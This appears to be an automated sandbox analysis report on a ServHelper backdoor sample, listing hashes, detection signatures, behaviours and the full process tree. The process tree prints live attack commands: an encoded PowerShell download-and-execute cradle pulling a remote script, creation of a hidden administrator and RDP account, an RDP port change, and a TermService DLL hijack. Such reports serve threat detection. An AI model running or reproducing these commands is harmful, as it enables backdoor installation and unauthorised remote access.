Analysis
-
max time kernel
137s -
max time network
180s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
22-09-2021 07:10
Static task
static1
Behavioral task
behavioral1
Sample
61d5e32562d1c70daf0a3112f7888258.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
61d5e32562d1c70daf0a3112f7888258.exe
Resource
win10v20210408
General
-
Target
61d5e32562d1c70daf0a3112f7888258.exe
-
Size
5.7MB
-
MD5
61d5e32562d1c70daf0a3112f7888258
-
SHA1
11c54ce99e87637f58c7bc0bd8134c73df9bf879
-
SHA256
da012f669961c3631b10dd147f38ca34796c40692e01b51dd206f6a5b755e605
-
SHA512
9cad97c4c71535a2391ad73d13e27748300e3147a3383d4eee85caadb461815f9ee8e9b172e732df16813fa8f5ffdc7115e2740778ebc51c536ab06fc7910cc2
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 10 1628 powershell.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1888 icacls.exe 1840 icacls.exe 688 takeown.exe 1396 icacls.exe 1772 icacls.exe 1964 icacls.exe 1056 icacls.exe 1672 icacls.exe -
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Loads dropped DLL 2 IoCs
Processes:
pid process 1852 1852 -
Modifies file permissions 1 TTPs 8 IoCs
Processes:
icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exepid process 1888 icacls.exe 1840 icacls.exe 688 takeown.exe 1396 icacls.exe 1772 icacls.exe 1964 icacls.exe 1056 icacls.exe 1672 icacls.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Windows\system32\rfxvmt.dll powershell.exe -
Drops file in Windows directory 21 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ce72d115-2a14-4d96-82c1-423615b22f64 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c2b2a3a3-6d66-4fff-b722-1374efd0e345 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b1c2efd2-c4a6-4a3d-871a-ad88f9e19c99 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e484b633-43f2-4341-9cf8-8d0482f56207 powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\697JC32QH7VC53QJMTQA.temp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b37b9c97-90dd-462d-863b-fa4071a4b59e powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6f584eb7-a5c9-47e6-94fe-eab0302050e6 powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_962932c3-718a-4659-bd9f-f8a703b735bc powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_92e09941-4f06-487c-b110-16566a51d47d powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a3d23646-1a6f-480b-8620-8400d86db01a powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_11b1ba59-eb8c-4543-9b2d-07cd4cb78241 powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_74dcc402-ab53-44ba-a397-6abd4975fcf8 powershell.exe -
Modifies data under HKEY_USERS 4 IoCs
Processes:
powershell.exeWMIC.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 40233aed91afd701 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1316 powershell.exe 1316 powershell.exe 1480 powershell.exe 1480 powershell.exe 1096 powershell.exe 1096 powershell.exe 1836 powershell.exe 1836 powershell.exe 1316 powershell.exe 1316 powershell.exe 1316 powershell.exe 1628 powershell.exe 1628 powershell.exe -
Suspicious behavior: LoadsDriver 5 IoCs
Processes:
pid process 472 1852 1852 1852 1852 -
Suspicious use of AdjustPrivilegeToken 18 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 1316 powershell.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeDebugPrivilege 1096 powershell.exe Token: SeDebugPrivilege 1836 powershell.exe Token: SeRestorePrivilege 1772 icacls.exe Token: SeAssignPrimaryTokenPrivilege 1396 WMIC.exe Token: SeIncreaseQuotaPrivilege 1396 WMIC.exe Token: SeAuditPrivilege 1396 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1396 WMIC.exe Token: SeIncreaseQuotaPrivilege 1396 WMIC.exe Token: SeAuditPrivilege 1396 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1824 WMIC.exe Token: SeIncreaseQuotaPrivilege 1824 WMIC.exe Token: SeAuditPrivilege 1824 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1824 WMIC.exe Token: SeIncreaseQuotaPrivilege 1824 WMIC.exe Token: SeAuditPrivilege 1824 WMIC.exe Token: SeDebugPrivilege 1628 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
61d5e32562d1c70daf0a3112f7888258.exepowershell.execsc.exenet.execmd.execmd.exedescription pid process target process PID 1984 wrote to memory of 1316 1984 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe PID 1984 wrote to memory of 1316 1984 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe PID 1984 wrote to memory of 1316 1984 61d5e32562d1c70daf0a3112f7888258.exe powershell.exe PID 1316 wrote to memory of 656 1316 powershell.exe csc.exe PID 1316 wrote to memory of 656 1316 powershell.exe csc.exe PID 1316 wrote to memory of 656 1316 powershell.exe csc.exe PID 656 wrote to memory of 796 656 csc.exe cvtres.exe PID 656 wrote to memory of 796 656 csc.exe cvtres.exe PID 656 wrote to memory of 796 656 csc.exe cvtres.exe PID 1316 wrote to memory of 1480 1316 powershell.exe powershell.exe PID 1316 wrote to memory of 1480 1316 powershell.exe powershell.exe PID 1316 wrote to memory of 1480 1316 powershell.exe powershell.exe PID 1316 wrote to memory of 1096 1316 powershell.exe powershell.exe PID 1316 wrote to memory of 1096 1316 powershell.exe powershell.exe PID 1316 wrote to memory of 1096 1316 powershell.exe powershell.exe PID 1316 wrote to memory of 1836 1316 powershell.exe powershell.exe PID 1316 wrote to memory of 1836 1316 powershell.exe powershell.exe PID 1316 wrote to memory of 1836 1316 powershell.exe powershell.exe PID 1316 wrote to memory of 688 1316 powershell.exe takeown.exe PID 1316 wrote to memory of 688 1316 powershell.exe takeown.exe PID 1316 wrote to memory of 688 1316 powershell.exe takeown.exe PID 1316 wrote to memory of 1396 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1396 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1396 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1772 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1772 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1772 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1964 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1964 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1964 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1056 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1056 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1056 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1672 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1672 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1672 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1888 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1888 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1888 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1840 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1840 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1840 1316 powershell.exe icacls.exe PID 1316 wrote to memory of 1108 1316 powershell.exe reg.exe PID 1316 wrote to memory of 1108 1316 powershell.exe reg.exe PID 1316 wrote to memory of 1108 1316 powershell.exe reg.exe PID 1316 wrote to memory of 1600 1316 powershell.exe reg.exe PID 1316 wrote to memory of 1600 1316 powershell.exe reg.exe PID 1316 wrote to memory of 1600 1316 powershell.exe reg.exe PID 1316 wrote to memory of 336 1316 powershell.exe reg.exe PID 1316 wrote to memory of 336 1316 powershell.exe reg.exe PID 1316 wrote to memory of 336 1316 powershell.exe reg.exe PID 1316 wrote to memory of 1492 1316 powershell.exe net.exe PID 1316 wrote to memory of 1492 1316 powershell.exe net.exe PID 1316 wrote to memory of 1492 1316 powershell.exe net.exe PID 1492 wrote to memory of 784 1492 net.exe net1.exe PID 1492 wrote to memory of 784 1492 net.exe net1.exe PID 1492 wrote to memory of 784 1492 net.exe net1.exe PID 1316 wrote to memory of 1708 1316 powershell.exe cmd.exe PID 1316 wrote to memory of 1708 1316 powershell.exe cmd.exe PID 1316 wrote to memory of 1708 1316 powershell.exe cmd.exe PID 1708 wrote to memory of 1092 1708 cmd.exe cmd.exe PID 1708 wrote to memory of 1092 1708 cmd.exe cmd.exe PID 1708 wrote to memory of 1092 1708 cmd.exe cmd.exe PID 1092 wrote to memory of 1552 1092 cmd.exe net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"C:\Users\Admin\AppData\Local\Temp\61d5e32562d1c70daf0a3112f7888258.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1316 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\05jmqopu\05jmqopu.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES32A3.tmp" "c:\Users\Admin\AppData\Local\Temp\05jmqopu\CSCA0D889081A1743489B4E2093EAD758D3.TMP"4⤵PID:796
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1480 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1836 -
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:688 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1396 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1772 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1964 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1056 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1672 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1888 -
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1840 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1108
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1600 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:336
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:784
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1608
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1132
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:296
-
C:\Windows\system32\net.exenet start TermService5⤵PID:1692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:2012
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:792
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:688
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵PID:1096
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵PID:1652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:688
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc M6LqWVFh /add1⤵PID:1396
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc M6LqWVFh /add2⤵PID:1620
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc M6LqWVFh /add3⤵PID:1504
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:624
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:1508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:1636
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD1⤵PID:524
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD2⤵PID:1732
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" QWOCTUPM$ /ADD3⤵PID:1492
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1388
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1224
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:1796
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc M6LqWVFh1⤵PID:1256
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc M6LqWVFh2⤵PID:1336
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc M6LqWVFh1⤵PID:1096
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1564
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1396
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1636
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1824
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1492
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:1688
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_0ce18943-ab59-4066-aeb2-b10edb6f9f77
MD5a70ee38af4bb2b5ed3eeb7cbd1a12fa3
SHA181dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9
SHA256dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d
SHA5128c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_573a45bd-b12f-4a5e-add0-1d1aa6cfa04f
MD56f0d509e28be1af95ba237d4f43adab4
SHA1c665febe79e435843553bee86a6cea731ce6c5e4
SHA256f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e
SHA5128dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d9bbdec-8ab1-4855-a491-8531e8811405
MD5faa37917b36371249ac9fcf93317bf97
SHA1a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4
SHA256b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132
SHA512614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b1d32d61-47b4-4686-9342-cd1aa78d28ec
MD5d89968acfbd0cd60b51df04860d99896
SHA1b3c29916ccb81ce98f95bbf3aa8a73de16298b29
SHA2561020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9
SHA512b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_cb33da80-6225-49e3-b468-e4a22a8388dc
MD5e5b3ba61c3cf07deda462c9b27eb4166
SHA1b324dad73048be6e27467315f82b7a5c1438a1f9
SHA256b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925
SHA512a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dcd079b1-de23-4531-b9b5-a9cac42e778d
MD57f79b990cb5ed648f9e583fe35527aa7
SHA171b177b48c8bd745ef02c2affad79ca222da7c33
SHA256080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683
SHA51220926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fb9f171a-bad4-450d-b222-3cfd78e062f0
MD52d5cd190b5db0620cd62e3cd6ba1dcd3
SHA1ff4f229f4fbacccdf11d98c04ba756bda80aac7a
SHA256ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d
SHA512edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD54ea69dafda7ebbc1ca647f6d1cf00955
SHA1ed2d10c7d446830c95086ddde2b6f03f55daff95
SHA2562b5720866d2cde6aff7e0da55e813ba71b96f366a4776889374c4f6df0ae0f59
SHA5126b2fef4550214cc84c0b82eee46c472b2df22ac097623c906b449403bdd16973bdea061280bbb514c228cefe8f35a0bb2a19c27ff8a9a04e77fe492430a075ed
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5e0c191ab1b3ba28db8b6c5e67f852c26
SHA1d3b7af7db2a2692eb0427120bb2e467ce49c711f
SHA256d667be52d1b013feddfe7d207a7880639441e7c0c6721f1e33aadec4a6c5f635
SHA51274ead2b11d85b638d2a090543c65148cd828a41f367ce607dcb0625fc9bc6262ed7010d794508aedb9738dcfa747df57546a3ab076027e3a64afcd5bec2a1e9a
-
MD5
fb7c7035e271ed0d72fb1fbf83c0f6ec
SHA11b981c98082df7377b84f07ec6ce5ed539872f80
SHA256b9dba969c28f809803b759e5406f87274083adf6d66bfbc98d2379b09e0905cb
SHA512307c5d3b00af58fd4262f154637fbd173cc4a1859c16afaad39f3cb67ed4f9efabc2ecb8c10659d5f57bdfa37d2e8c7d6dd2063cb7e16b0426a42bc95afcaa42
-
MD5
391041e3fb747dc2efdedcd0af2370ad
SHA112c880e66405c7d4f637b01aed9180839605d375
SHA25641d11488f50ee0c171d5a258a01e041ada8c693805c0d5eafffd914db85cc47d
SHA51277e9d87d2a6a8e9385725785226f6b697a82e3b49838a2121141e8f6ceb3739db9e0bda15d222eb3a33596c044ee4958204680ff3eee25a38bf1b4ed3e965ac6
-
MD5
9fca6b1768eba2c5d42f189123152e32
SHA1560ec3249af6e8d82e994554475b870d32145352
SHA256c5c7012656bfebd5ba7d4ae8459bd2fcc57ac661e413e2b1da339b9fba86de1f
SHA512b72f2bc28dcde144596eabb62375479c4ddb3b004ac8759ee9523170289f55572784e695a552fd612a5dc5a56f6c76b3baee9831c7cac7123f72b2eb2aadb3f2
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5213ec77f56ab0691d0b4e8546031f143
SHA1a49d41a230c3d246d2868d071670c28ea257b2f8
SHA256fabd8ee78b221f077fb552296220957ffc79b09493bf18c7133abb6518c800b8
